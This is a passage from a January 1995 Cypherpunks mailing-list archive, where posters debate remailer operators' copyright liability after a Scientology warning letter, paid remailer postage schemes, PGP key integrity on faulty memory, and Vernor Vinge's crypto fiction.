not. I suspect not, because the action was entirely _ex parte_ (Latin for one-sided). Mike, again? Other legal folk? I know nothing about the second one. nhow do you remailer-ops plan to react? my first instinct (were i running a remailer) would be to ignore it, on grounds that i wouldn't examine any mail passing through. The people who keep logs, yes, are in more danger than those who don't. Eric From greg at ideath.goldenbear.com Thu Jan 5 00:25:20 1995 From: greg at ideath.goldenbear.com (Greg Broiles) Date: Thu, 5 Jan 95 00:25:20 PST Subject: Remailers, law and the Church of Scientology Message-ID: <199501050035.AA02970@ideath.goldenbear.com> -----BEGIN PGP SIGNED MESSAGE----- AvI Harris Baumstein writes: >> clients' property rights. Courts are holding such >> contributory infringers liable. Two examples are: Sega >> Enterprises Ltd. v. Maphia BBS, 30 U.S.P.Q. 2d 1921 (N.D. >> Cal. 1994) and Playboy Enterprises v. Frena, 839 F. Supp. >> 1152 (M.D. Fla. 1993). >what of these cases? is this just an example of typical lawyerly >intimidation tactics? Neither case is particularly similar to the remailer situation. _Maphia_ concerned a business which sold $350 boxes to copy SEGA programs from and to ROM cartridges; they also sold access to their BBS which held unlicensed copies of SEGA games. The court held that the copying devices had no purpose other than to contribute to infringement, and that when SEGA programs were uploaded to the BBS, the upload was made with the knowledge of the defendants. _Frena_ involved a BBS operator who made copyrighted pictures from Playboy available on his BBS; Playboy trademarks were removed from the pictures prior to posting. Access to the BBS was only available to people who paid for access, or who otherwise did business with the defendant. The court's discussion about the defendant's mental state in _Frena_ consists of a single sentence, and a cite to Jay Dratler, Jr., "Intellectual Property Law: Commercial Creative, and Industrial Property", $ 6.01[3] at 6-15(1991). The court seems to be addressing direct, not contributory infringement. (I don't have Dratler available easily right now so I dunno what it says.) _Maphia_ does cite text from _Casella v. Morris_ 820 F.2d 362 (11th Cir. 1987): "'[o]ne who, with knowledge of the infringing activity, induces, causes or materially contributes to the infringing conduct of another' may be held liable as a contributory infringer." (quoting from _Gershwin Publishing Corp. v. Columbia Artists Management, Inc._, 443 F.2d 1159,1162 (2nd Cir. 1971). I don't think the cases cited stand for what the Church's attorney says they stand for. I'm not convinced that the "contributory infringement" doctrine can be reasonably applied to remailer operators; and I'm not sure that remailer operators have the sort of mental state (knowledge) required to create liability. The letter to operators may be part of a strategy to establish knowledge of the potential for misuse, to later prevent operators from claiming a lack of knowledge. I'm not sure that a vague warning "someone might use your service to infringe a copyright" is strong enough to establish that sort of knowledge. As a remailer operator, I don't see a good way to eliminate infringing uses without also eliminating non-infringing uses; the crazy politics around this Scientology stuff makes it seem like the perfect place for people to use remailers. I also think the non-commercial and political nature of postings to the Scientology groups may make a fair-use analysis turn out differently than in _Maphia_ and _Frena_; both defendants tried a fair use argument, and both lost. On the other hand, I'm a law student, not an attorney, and the person who wrote that letter certainly knows more about law in general and about copyright than I do. I may be totally hosed. Coincidentally or not, I had a long chat today with the sysadmin of the system immediately upstream from mine. He said, out of the blue, "So .. you run a remailer?". In the past he has been privacy-friendly and anon-friendly, and seems to remain so today, but the timing was a little peculiar. I explained about the remailers and told him how to get Raph's list and about alpha.c2.org and all the rest of it. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLws+TH3YhjZY3fMNAQEpmgP+JnIZKmdzLWx3P8fMVO0v1pEZ33lrlHHe FLZBnk59rDXZBomFhprlZAs65ERmKBbugXRJYkPhFA7aKYqcmpquGj6BqWp0oTul SjHS3OWpsDJhPVEWzt5uOhlV5WrDdhqUWgrI9hN1nfLHnD/Y2NGvPPUt4J2Web/H uD9htAdxH8o= =U4oG -----END PGP SIGNATURE----- From lmccarth at ducie.cs.umass.edu Thu Jan 5 00:59:11 1995 From: lmccarth at ducie.cs.umass.edu (L. McCarthy) Date: Thu, 5 Jan 95 00:59:11 PST Subject: C'punks Economist Fan Club Message-ID: <199501050904.EAA09785@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- > Why is it that so many cypherpunks like the economist? The Economist is my favorite magazine (my parents' too). I don't read it regularly, but that has more to do with my being busy than anything else. It succeeds in providing fairly balanced in-depth coverage of international news that isn't terribly Amerocentric or Anglocentric. At worst it's G7-centric, but I think that's entirely reasonable ;) It's witty, politically aware, relatively technically savvy. The articles exhibit a healthy (IMHO) cynicism about what happens and why, yet maintain some idealism about what should happen. It's not perfect, but it's difficult to imagine surpassing it. I recently read an interview with Bill Gates in which he was asked which periodicals he reads. His first response was: "The Economist, every page". -L. Futplex McCarthy; PGP key by finger or server "The objective is for us to get those conversations whether they're by an alligator clip or ones and zeroes. Wherever they are, whatever they are, I need them." -FBI Dir. Freeh - -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLwu1BGf7YYibNzjpAQH9nAP/SMG+SpBKMnW0owZJb8mH1+boR8veHxZR ZHF88L2XRKb4PRvzBho8oukfGAneaTJ45EaApZ7PAcz+zWin3PT3IHl6KqsgZger nHl2g7HHVqVO+XXbcpM3eSzvfA8lzbQgWLGM+0RAguYjAPFoMgWNunDU7xUrfuwY 66mBQMCNUlo= =QPTj - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLwu2ISoZzwIn1bdtAQEw0wGA4UqmMyxtaoR6nzs54zUesF2CvvSROy6O xAOR//mT0N6v7oLdhTmOHlWDVeFqJBXw =M8TG -----END PGP SIGNATURE----- From norm at netcom.com Thu Jan 5 01:07:06 1995 From: norm at netcom.com (Norman Hardy) Date: Thu, 5 Jan 95 01:07:06 PST Subject: another factoring thing. . . . Message-ID: At 11:04 PM 12/30/94, camp at industrial.com wrote: >Hey did anyone see the artical, some time ago in Science News (May 14, >1994) their was this artical on using a 'quantum computer'. Through >the marvels of quantum mechanics it is theroretically possible to >build a computer that would be really good at factoring large numbers >such as the ones used in RSA. This combined with team sieving could >possibly be used to signifigantly reduce the time required to factor >a key. Any thougts, did anyone else see the artical, has there already >been a really stimulating discusion that I missed? Well let me know. .... I think that that kind of quantum computer is much less likely to be built to impact RSA style crypto, than some revolutionary sort of factoring algorithm. It is not clear whether the tolerances required for the quantum computer can ever be met and it is not entirely clear if the quantum principles are correct. I don't entirely rule it out however. From rah at shipwright.com Thu Jan 5 04:20:20 1995 From: rah at shipwright.com (Robert Hettinga) Date: Thu, 5 Jan 95 04:20:20 PST Subject: No Subject Message-ID: Factoids lifted from apple-internet-users at medraut.apple.com: >Jonathan P. Sullivan wrote : > Here are some other stats culled from an article in the 12/22/94 edition of > Washington Technology: > >* Approximately 300,000 attacks have been made on DoD computers >* Hackers have successfully compromised 350 DoD computer systems >* 88% of all information warfare attacks succeed >* 96% of those successful attacks are never noticed >* Only 4% of those noticed are reported Cheers, Bob Hettinga ----------------- Robert Hettinga (rah at shipwright.com) "There is no difference between someone Shipwright Development Corporation who eats too little and sees Heaven and 44 Farquhar Street someone who drinks too much and sees Boston, MA 02331 USA snakes." -- Bertrand Russell (617) 323-7923 From nelson at crynwr.com Thu Jan 5 04:29:02 1995 From: nelson at crynwr.com (Russell Nelson) Date: Thu, 5 Jan 95 04:29:02 PST Subject: Remailer Abuse In-Reply-To: <9501050453.AA10198@tadpole.tadpole.com> Message-ID: From: db at Tadpole.COM (Doug Barnes) Date: Wed, 4 Jan 1995 22:11:11 -0600 (CST) Heh. An anonymous remailer paid for by credit card... there'd have to be an additional level of indirection for it to work, which would make the methods for tracking those who don't pay quite problematic. Why wouldn't it work? I plan on doing this, and I'll be selling lots of things besides a remailer, including lots of email traffic. So there won't be any effective way to find out who paid for access to my remailer. Sure, I'll know who used it, but I'm not going to keep that information. (Yes, yes, FV says that I have to keep records of who bought what, but I'll label all my information with a random number, that simply says that X bought information worth Y, not *what* information.) And if you don't trust a remailer operator, then you won't use it. -- -russ http://www.crynwr.com/crynwr/nelson.html Crynwr Software | Crynwr Software sells packet driver support | ask4 PGP key 11 Grant St. | +1 315 268 1925 (9201 FAX) | What is thee doing about it? Potsdam, NY 13676 | What part of "Congress shall make no law" eludes Congress? From perry at imsi.com Thu Jan 5 05:24:23 1995 From: perry at imsi.com (Perry E. Metzger) Date: Thu, 5 Jan 95 05:24:23 PST Subject: Siegel and Lewis In-Reply-To: Message-ID: <9501051324.AA16313@snark.imsi.com> Michael Conlen says: > As I understand it, the government owns a portion of the internet. Nope. Sorry. They don't. > Does anyone have any information on what grouds Seigel and Lewis > plan to use for legislation? Peter Lewis is a reporter, and to my knowledge has no plans to lose his job by lobbying for legislation. I am unaware of what his opinions on this topic might be. My only beef with him is that his stories tend to be full of inaccuracies. This mornings, for instance, gave the impression that there are no unpatented algorithms available to do high-quality compression -- when of course, there are many. Perry From jthomas at access.digex.net Thu Jan 5 05:50:35 1995 From: jthomas at access.digex.net (Joe Thomas) Date: Thu, 5 Jan 95 05:50:35 PST Subject: Remailer Abuse In-Reply-To: Message-ID: On Thu, 5 Jan 1995, Russell Nelson wrote: > From: db at Tadpole.COM (Doug Barnes) > Heh. An anonymous remailer paid for by credit card... there'd > have to be an additional level of indirection for it to work, > which would make the methods for tracking those who don't pay > quite problematic. > Why wouldn't it work? I plan on doing this, and I'll be selling lots > of things besides a remailer, including lots of email traffic. So > there won't be any effective way to find out who paid for access to my > remailer. Another thought: why couldn't you sell a book of "stamps" -- Magic Money tokens -- and get paid for them using First Virtual? This would get around two problems: the lack of anonymity using First Virtual, and the fairly high 29-cent-per-transaction fee. You could sell a book of twenty remailer stamps for a dollar, or something. I'd buy. And it wouldn't make it too easy for people to use remailers without paying. FV will still take an account away from someone who denies legitimate charges too many times. I guess there is the problem of Chaum's patents (and RSA's). Is there anyplace where neither set of patents is valid, or where they'd be practically unenforceable? Joe From jya at pipeline.com Thu Jan 5 07:05:49 1995 From: jya at pipeline.com (John Young) Date: Thu, 5 Jan 95 07:05:49 PST Subject: NYT on $GIF Message-ID: <199501051505.KAA06613@pipe4.pipeline.com> Peter Lewis writes today on Compuserve and Unisys grub for royalties on GIF. Perry has noted its sty, java-eyely. For email copy send blank message with subject: GIF_nip From nobody at CSUA.Berkeley.EDU Thu Jan 5 08:51:05 1995 From: nobody at CSUA.Berkeley.EDU (Tommy the Tourist (Anon User)) Date: Thu, 5 Jan 95 08:51:05 PST Subject: _Why_ the print media doesn't like Usenet Message-ID: <199501051651.IAA24155@soda.CSUA.Berkeley.EDU> As many of you know, recent articles and editorials in the nations main newspapers (_New_York_Times and the _Chicago_Tribute_ to name just two) have presented shockingly distorted accounts of the infamous Canter & Siegel Usenet spam. Ordinary Usenetters, outraged at the socking abuse of the internet by Canter & Siegel, were transformed into "network terrorists" in these editorials. The attorneys, who have haughtily expressed their determination to repeatedly inconvenience millions of Usenet readers by flooding Usenet newsgroups with unsolicited advertisements, were portrayed as the innocent victims of anti-business "vigilantes" bent on terrorizing the attorneys after their widespread Usenet spam last year. The articles also included numerous serious technological inexactitudes which supported the distorted conclusions of the articles. The articles called for increased government regulation of the internet in order to thwart the alleged abuses. Determined efforts by Usenetters to educate the print media into presenting a more balanced (and, I might add, less dis-ingenuous point of view) have been in vein. It seems reasonable to point out the following facts: 1. It has not been unknown for powerful individuals in newspapers (such as editors and owners) to manipulate articles for political purposes. 2. Usenet has often been highly critical of the print media, especially editorials which disagreed with strongly held Usenet views and articles which contained erroneous information. This criticism may have been seen by the print media as damaging. 3. From time to time articles published in newspapers have been posted (sometimes anonymously) to various newsgroups. This has denied the print media of revenue since readers only had to turn to Usenet to read especially sensationalist articles. 4. In the past, the print media has held a monopoly on detailed news. Sure, television could bring news stories instantly, but for detail one had to turn to the newspaper. Usenet and the internet are capable of providing very detailed information rapidly and on demand, changing instantly as conditions change. It is a very real competitor. 5. Government regulation would seriously hurt Usenet. Censorship (like an FCC censor) and regulation of anonymous remailers would result in increased legal liability on the internet. Holding Usenet posters and other providers of information liable for the accuracy and tastefulness of their information would make many people think twice before making their information available. This would eliminate not only inaccurate and tasteless information, but it would also greatly hinder the flow of even accurate information. This would put the print media on a more even footing. These facts together suggest that it might be to the advantage of the print media to call for government regulation. Once this is realized, the behavior of these newspapers can be better understood, and action can be taken against them: 1. Misleading information in the print media about Usenet must be widely disseminated so as to damage the reputations of newspapers that print inaccurate accounts and encourage them to get their facts straight the next time around. 2. The print media's self-interest in government regulation of Usenet must be pointed out, both to the public and to law-makers so as to reduce the effectiveness of their pleas. 3. Usenet should seek the support the of the media (especially rivals like TV media that have less to lose from Usenet) to obtain favorable and anti-regulatory publicity. -> If you found this article interesting, please feel free to distribute widely. <- ------------ To respond to the sender of this message, send mail to remailer at soda.berkeley.edu, starting your message with the following 8 lines: :: Response-Key: the-clipper-key ====Encrypted-Sender-Begin==== MI@```%I^&2?(E+YR'QAJ3&+D2`UAI&EZX\# M%D0S6>LX!B&XC`CI2S9?]$AN7*P9K`)Q4JT_V`>$K2Z,T(@` ====Encrypted-Sender-End==== From jpb at gate.net Thu Jan 5 11:11:06 1995 From: jpb at gate.net (jpb at gate.net) Date: Thu, 5 Jan 95 11:11:06 PST Subject: Remailer postage Message-ID: <199501051802.NAA22909@seminole.gate.net> Russ, Where can I get the Magic Money software? I'm also interested in a combination FV/MM approach to anonymous postage. I'm still waiting to get my linux box set up (hassle with client paying the bill and all that fun stuff) but am considering starting a remailer once I get the site set up. I am concerned about the ethics of having a paymailer feed into the free remailer soup - how would their operators react if I'm effectively making money (no matter how little) off of them? In the interest of preserving anonymity, perhaps their should be a set postage rate - that way someone could use a digital stamp anywhere, helping to confuse the audit trail. I'm not sure if I want to get involved in the hassles of redemption though. It would probably become a major hassle for all the operators to have to do that much accounting on a regular basis. jpb at gate.net finger for pgp and ripem keys From nelson at crynwr.com Thu Jan 5 11:14:40 1995 From: nelson at crynwr.com (Russell Nelson) Date: Thu, 5 Jan 95 11:14:40 PST Subject: Remailer postage In-Reply-To: <199501051802.NAA22909@seminole.gate.net> Message-ID: From: jpb at gate.net Date: Thu, 5 Jan 1995 13:02:57 -0500 (EST) I am concerned about the ethics of having a paymailer feed into the free remailer soup - how would their operators react if I'm effectively making money (no matter how little) off of them? There is no ethical problem. How do they know someone isn't making money off them already? If they haven't considered that, they should. -- -russ http://www.crynwr.com/crynwr/nelson.html Crynwr Software | Crynwr Software sells packet driver support | ask4 PGP key 11 Grant St. | +1 315 268 1925 (9201 FAX) | What is thee doing about it? Potsdam, NY 13676 | What part of "Congress shall make no law" eludes Congress? From tcmay at netcom.com Thu Jan 5 11:50:51 1995 From: tcmay at netcom.com (Timothy C. May) Date: Thu, 5 Jan 95 11:50:51 PST Subject: Remailer postage In-Reply-To: <199501051802.NAA22909@seminole.gate.net> Message-ID: <199501051942.LAA07959@netcom8.netcom.com> jpb at gate.net wrote: > I am concerned about the ethics of having a paymailer feed into the free > remailer soup - how would their operators react if I'm effectively making money > (no matter how little) off of them? I can't speak for others, but making money off remailing is a GOOD THING. If other remailers wish to give their services away for free, so be it. There will likely be an ecology of remailers with different fee schedules, different technical capabilities, and different policies. Personally, I think that "free remailers" will always be with us, but will come and go, as spammers and the like abuse them. The invisible hand will of course choose some and reject others. And a for-pay remailer is not making money "off them" (the other remailers), as the paying customer is the one who is making the choice of which remailers to use, which to pay digital postage on, etc. [Comment: I see disdainful comments here about the profit motive, about for-pay services, etc. I urge folks to carefully think about this point. Services that are "free" are actualy paid for by someone, in various ways and for various motivations. Some things are worth paying for, some are not. Any customer who pays for remailing has made an uncoerced, voluntary decision that his interests are better serviced by paying for remailing than by using a free remailer. Sounds fair to me.] --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero 408-688-5409 | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From danisch at ira.uka.de Thu Jan 5 12:56:32 1995 From: danisch at ira.uka.de (Hadmut Danisch) Date: Thu, 5 Jan 95 12:56:32 PST Subject: Are 2048-bit pgp keys really secure ? Message-ID: <9501052056.AA24402@elysion.iaks.ira.uka.de> > A somewhat disturbing trend has appeared in the low-end cost-sensitive PC > SIMM market. Some supposedly 9-bit SIMMs are actually 8-bit SIMMs plus > a parity generator. This means that the parity checking is essentially > subverted, because the parity bit is generated from the stored contents > of memory at read time, rather than the stored contents when it was > written to. As such, NO bit errors are detected. So why not do a cheap trick: After the small primes check calculate a CRC checksum over the number. Then do the primality check. If it is a prime, store it together with the CRC. The CRC can be checked for every use of the number. (PGP encrypts the secret key and therefore it generates a CRC for the encrypted packet. But this CRC is generate after the primality check.) We already had some SIMM modules with bit errors. They were detected by a parity check. If cheap pc simms don't have a real parity bit, the probability of having such a bug isn't as low as 10^-40. If cheap parity-less simms are available they get sold (cheap and expensive). Hadmut BTW: Some weeks ago they found motherbords with falsified cache rams: They had just the normal DIL-ICs and the normal pins, but the plastic of the ICs didn't contain a chip. The BIOS was modified to give out a message about a good cache ram check at boot time. From db at Tadpole.COM Thu Jan 5 13:03:52 1995 From: db at Tadpole.COM (Doug Barnes) Date: Thu, 5 Jan 95 13:03:52 PST Subject: Remailer postage In-Reply-To: <199501051802.NAA22909@seminole.gate.net> Message-ID: <9501052103.AA23382@tadpole.tadpole.com> I strongly agree with Tim that one should not look down at for-profit anonymizing services. This is the _only_ way I see to establish and maintain reliable service and avoid spamming and denial of service. It's also the only way such a service can scale if it becomes suddenly popular -- if there's no increased revenue, it's going to be harder to get more h/w and bandwidth. Even if one had a heart of gold and purely charitable instincts, one would eventually come to the conclusion that such a service operates better if users are paying for it. And this is even before we address matters like the benefits of competition. Doug From mnemonic at eff.org Thu Jan 5 13:27:04 1995 From: mnemonic at eff.org (Mike Godwin) Date: Thu, 5 Jan 95 13:27:04 PST Subject: Warning letter from Co$. [any comments ?] In-Reply-To: <199501050801.AAA18013@largo.remailer.net> Message-ID: <199501052127.QAA09356@eff.org> Actually, civil copyright infringement liability doesn't turn on knowledge. You can be an infringer even if you don't know. Criminal copyright infringement requires a guilty mental state, so *that* you have to know. > From: Avi Harris Baumstein > > i know there has been much chatter on this subject, but are there > truly any precedents that could hold on the anonymous distribution of > copyrighted material? > > Cubby v. Compuserve is relevant here, as well as that bookstore case > in the 50's that I never remember the name of. Mike G., can you help > me out on this one? > > These cases are about other kinds of wrongs (libel in one and > obscenity (?) in the other), but copyright violation doesn't seem to > be have any particular features to set it apart from the basic > principle of these. Namely, if you know, you're responsible; if you > don't, you're not. This, you all realize no doubt, is a gross > simplification of a long chain of reasoning. > > what > exactly constitutes a trade secret, and what sort of laws apply? > > The short answer is that if you didn't sign a trade secret agreement > or are party to one by some other relationship (such as agency), then > a trade secret that comes your way is no secret any more. > > > clients' property rights. Courts are holding such > > contributory infringers liable. Two examples are: Sega > > Enterprises Ltd. v. Maphia BBS, 30 U.S.P.Q. 2d 1921 (N.D. > > Cal. 1994) and Playboy Enterprises v. Frena, 839 F. Supp. > > 1152 (M.D. Fla. 1993). > > what of these cases? is this just an example of typical lawyerly > intimidation tactics? > > I have personal experience with the first case. It was a local BBS > run by a friend of a friend, and I got involved a year ago right after > the seizure. (It was, BTW, a _civil_ seizure of a BBS, not criminal.) > I believe the case settled out of court. There were court documents > approving the seizure however; I don't know if these set precedent or > not. I suspect not, because the action was entirely _ex parte_ (Latin > for one-sided). Mike, again? Other legal folk? > > I know nothing about the second one. > > nhow do you remailer-ops plan to react? my first > instinct (were i running a remailer) would be to ignore it, on grounds > that i wouldn't examine any mail passing through. > > The people who keep logs, yes, are in more danger than those who don't. > > Eric > From s675570 at aix1.uottawa.ca Thu Jan 5 13:45:27 1995 From: s675570 at aix1.uottawa.ca (Angus Patterson) Date: Thu, 5 Jan 95 13:45:27 PST Subject: True Names Message-ID: I've been trying to get True Names by Vernor Vinge, and have been told it's out of print (like most good cypunk ), does anybody have it scanned? I realize this is without permission, so does anybody have Vinge's address? (e-mail or otherwise) or could anybody ask him? Btw, does he have any other crypto/anonymity related stories? Thanks in advance. From tcmay at netcom.com Thu Jan 5 13:49:56 1995 From: tcmay at netcom.com (Timothy C. May) Date: Thu, 5 Jan 95 13:49:56 PST Subject: Remailer postage In-Reply-To: <9501052103.AA23382@tadpole.tadpole.com> Message-ID: <199501052148.NAA07203@netcom5.netcom.com> Doug Barnes wrote: > I strongly agree with Tim that one should not look > down at for-profit anonymizing services. This is the > _only_ way I see to establish and maintain reliable > service and avoid spamming and denial of service. > It's also the only way such a service can scale if > it becomes suddenly popular -- if there's no increased > revenue, it's going to be harder to get more h/w and > bandwidth. Indeed, the problems Julf & Company are having in getting adequate CPU power is illustrative. I see Julf saying he desperately needs some more computer power (this was a few months back) and I see others making the same tired old calls for "donations." (I say tired because requests that some people make contributions to effectively pay for the services used freely by others are rarely very effective....look to the sorry state of public broadcasting "begathons" for one example.) Instead of pointless beggings of the form "If only everyone who used Julf's service would send him $5," a pay-per-use system is much more scalable, and "closes the loop" on who pays. To wit, those that use the service, pay. Those that don't, don't. (I understand that Russ Nelson has experience in the shareware business, so he may know how many people send in their voluntary contributions. My understanding is that it's a tiny fraction, and that few shareware authors ever make much money. I've talked to some of them, and they consider shareware a failed experiment, except for new products trying to break into crowded markets, where the "shareware" label is just a facade for essentially giving it away in exchange for fame and eventual fortune if the product goes commercial.) > Even if one had a heart of gold and purely charitable > instincts, one would eventually come to the conclusion > that such a service operates better if users are > paying for it. And this is even before we address matters > like the benefits of competition. Precisely. A for-pay remailer can also be pressured by customers to enhance services, not take the remailer down for frivolous reasons, etc. It's real hard to ask a "charityware" remailer to honor comitments, add features, etc. Simple economics, and free market anarchy. Nobody here is proposing that fees be set (how could we?), that free remailers be banned (how?), etc. Those that want to give away their products are free to do so, just as those who want to charge $25 per remailing are free to do so. Free remailers will have a place, but will likely get "discovered" by spammers and by those who see no costs in adding it to their remailer chains. Hence, overuse. (More precise than "overuse": crowding, poor service, flakiness, etc.) Just like anything else in economics. The users ("the market") will largely determine how it all shakes out. There are fortunately no government agencies in any of the countries I know of that claim to be able to set fee schedules, ban "price gouging," ban "underpricing," or regulate remailers in any practical way. service, flakiness, etc.) Just like anything else in economics. (Such moves may someday come, but that's another topic.) --Tim -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero 408-688-5409 | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From wcs at anchor.ho.att.com Thu Jan 5 14:08:40 1995 From: wcs at anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204) Date: Thu, 5 Jan 95 14:08:40 PST Subject: Remailer Abuse Message-ID: <9501052114.AA03759@anchor.ho.att.com> Russ Nelson writes: > Heh. An anonymous remailer paid for by credit card... > Sure, I'll know who used it, but I'm not going to keep that > information. (Yes, yes, FV says that I have to keep records of who > bought what, but I'll label all my information with a random number, > that simply says that X bought information worth Y, not *what* > information.) And if you don't trust a remailer operator, then you > won't use it. I'd be worried about a couple of issues - one is just the transaction cost - can you successfully market remailer use at a buck a shot or whatever you'd be charging beyond FV's 29c stamp, or would you have some convenient way to aggregate bill? Beyond that, though, are some traffic analysis problems - remailers require a fair bit of traffic to be useful, and unless you receive a reasonable amount of encrypted traffic, and support encrypted email for purchasing remailer service and other merchandise, an eavesdropper would have a fairly good source of traffic data on your remailer users, especially since buying and using remailer service requires two messages within an hour or so. An alternative billing mechanism, which wouldn't use Chaum-patented cash, would be to sell a bunch of one-shot random-number tokens. When you sell the tokens, you add them to the database of valid tokens, and when one comes in on a message you delete it. This allows you to sell more than one message or service-period per FV transaction, and separates the purchase and use by a longer time, without adding the need for record-keeping based on the user's ID. It obviously does require encrypted reply messages. Another variant is for the user to send you a bunch of tokens along with the purchase, which you store. Blind signatures would improve the security of this process, but require more computation and may involve Chaum's patents. In this case, the message from the client to you would be encrypted, but you wouldn't have to send a reply, so the request could come in anonymously. Bill From tcmay at netcom.com Thu Jan 5 14:32:10 1995 From: tcmay at netcom.com (Timothy C. May) Date: Thu, 5 Jan 95 14:32:10 PST Subject: True Names In-Reply-To: Message-ID: <199501052231.OAA11745@netcom5.netcom.com> Angus Patterson wrote: > > I've been trying to get True Names by Vernor Vinge, and have been told it's > out of print (like most good cypunk ), does anybody have it scanned? > I realize this is without permission, so does anybody have Vinge's address? > (e-mail or otherwise) or could anybody ask him? Btw, does he have any other > crypto/anonymity related stories? Thanks in advance. I see copies in used bookstores often. It's in the collection "True Names and Something-or-other" and was in print until recenly. I also have the Bluejay edition, with an afterward by Marvin Minsky. Check around any large used bookstore. It's too long for reasonable scanning (and I have both a scanner and an OCR program, and scanned-in one or more of the papers at the soda site) and would bring on heat. Besides, it's just too easy to find in bookstores or libraries, regardless of being "out of print." As to other such stories, "The Ungoverned" is interesting. And fo course the "Peace War" and "Marooned in Realtime" (aka "Mushrooms in Real Slime") novels have some futurist items of interest. (In particular, I think of public key crypto as "bobbling" data inside, encasing data in a silvery sphere unbreachable by outsiders. I mentioned this to Vinge once and he was amused.) Finally, his Hugo-winning novel, "A Fire Upon the Deep," has some casual mentions of crypto, including the odd speculation that those in the know in the distant future don't really trust public key crypto. Death to vermin! --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero 408-688-5409 | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From rah at shipwright.com Thu Jan 5 14:40:11 1995 From: rah at shipwright.com (Robert Hettinga) Date: Thu, 5 Jan 95 14:40:11 PST Subject: GIF_nip Message-ID: ----------------- Robert Hettinga (rah at shipwright.com) "There is no difference between someone Shipwright Development Corporation who eats too little and sees Heaven and 44 Farquhar Street someone who drinks too much and sees Boston, MA 02331 USA snakes." -- Bertrand Russell (617) 323-7923 From erc at s116.slcslip.indirect.com Thu Jan 5 14:40:30 1995 From: erc at s116.slcslip.indirect.com (Ed Carp [khijol Sysadmin]) Date: Thu, 5 Jan 95 14:40:30 PST Subject: available NNTP posting sites? Message-ID: Does anyone have a list of NNTP sites that take connections from anyone for posting? My regular NNTP site seems to be hosed, or something, and I have a post that needs to get out, but also needs to originate from this site. Thanks in advance :) -- Ed Carp, N7EKG Ed.Carp at linux.org, ecarp at netcom.com 801/534-8857 voicemail 801/460-1883 digital pager Finger ecarp at netcom.com for PGP 2.5 public key an88744 at anon.penet.fi ** PGP encrypted email preferred! ** "What's the use of distant travel if only to discover - you're homeless in your heart." --Basia, "Yearning" From meconlen at IntNet.net Thu Jan 5 14:44:10 1995 From: meconlen at IntNet.net (Michael Conlen) Date: Thu, 5 Jan 95 14:44:10 PST Subject: Siegel and Lewis In-Reply-To: Message-ID: On Wed, 4 Jan 1995, Jonathan Cooper wrote: > > is how can they regulate what private business and citizen's do with > > there Fiber Optic's, ISDN lines, telephone lines, and computers. If the > > They already do - look at the regulations on telcos, power companies, > water companies, cellular/paging companies, lawyers, doctors, etc. A big difference between the 'net and some of the above, is that the net has been around in a very large presence (internatonaly) before the laws are being introduced, where as paging and cellular service didnt exist. As far as lawyers and doctors and lawyers, one of the big things the government does is protect agianst quacks. Not to many people are going to argue with this. The government wants to protect us from speech in the case of the 'net, well there are quite a few people who are going to stand up for their first amenment rights. If you want your own communication service, you can buy it. weather you use fiber based WAN's or go straight for satalite service, used by companies such as Holiday Inn, or Circuit City. You can exchange any information you want. I think the important thing to remember is that net access is not a right. My service provider has the right to give service to whom they please, as long as race, sex, or creed are not deciding factors. What goes across .gov and .mil computers is one thing, however what commes across sprintlink's computers to my service proveder to my computer is up to sprintlink, Intnet.net and myself. I dont care to read racist comments, so I dont view them. If I want to download nudie gifs, its my business, and right as stated under the First Amenment. From hfinney at shell.portal.com Thu Jan 5 15:11:42 1995 From: hfinney at shell.portal.com (Hal) Date: Thu, 5 Jan 95 15:11:42 PST Subject: Vinge reference in Moving Mars Message-ID: <199501052312.PAA26449@jobe.shell.portal.com> Greg Bear's novel Moving Mars, now out in paperback, has a cute reference to Vernor Vinge's ideas from True Names. p.208: "'Don't stick on the names,' Orianna said, shaping the living room into more Regency. 'All my friends are into Vernoring. They work and play with fake names. I don't know their true ones. Not even their parents know.' "'Why?' "'It's a game. Two rules - nobody knows what you're doing, and you do nothing illegal.' "'Doesn't that take the fun out of doin crypto?' I asked. "'Wow - crypto! Hide in the tomb. Sorry. I shy from two-edged words. We call it Vernoring.' "'Doesn't it?' I persisted. "'No,' Oriana said thoughtfully. 'Illegal is harm. Harm is stupid. Stupid is its own game, and none of my friends play it. Here's Kite.'" The book is pretty good, lots of nano and other hot tech, but not much crypto (sorry, Vernoring)... A little slow in places, though. Hal From lmccarth at ducie.cs.umass.edu Thu Jan 5 15:30:21 1995 From: lmccarth at ducie.cs.umass.edu (L. McCarthy) Date: Thu, 5 Jan 95 15:30:21 PST Subject: Anonymity in Donating Message-ID: <199501052335.SAA16921@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- Some nice examples of the preservation of anonymity in charitable donations, both for the donor and for the recipient, caught my attention today. An article by Clare Ulrich in the December 1994 Communique (Vol.18 No.3), published by The Cornell Campaign, pays tribute to an anonymous donor to Cornell U.: "While some acts of generosity are marked by a name on a building or a plaque on a wall, others, so to speak, can be 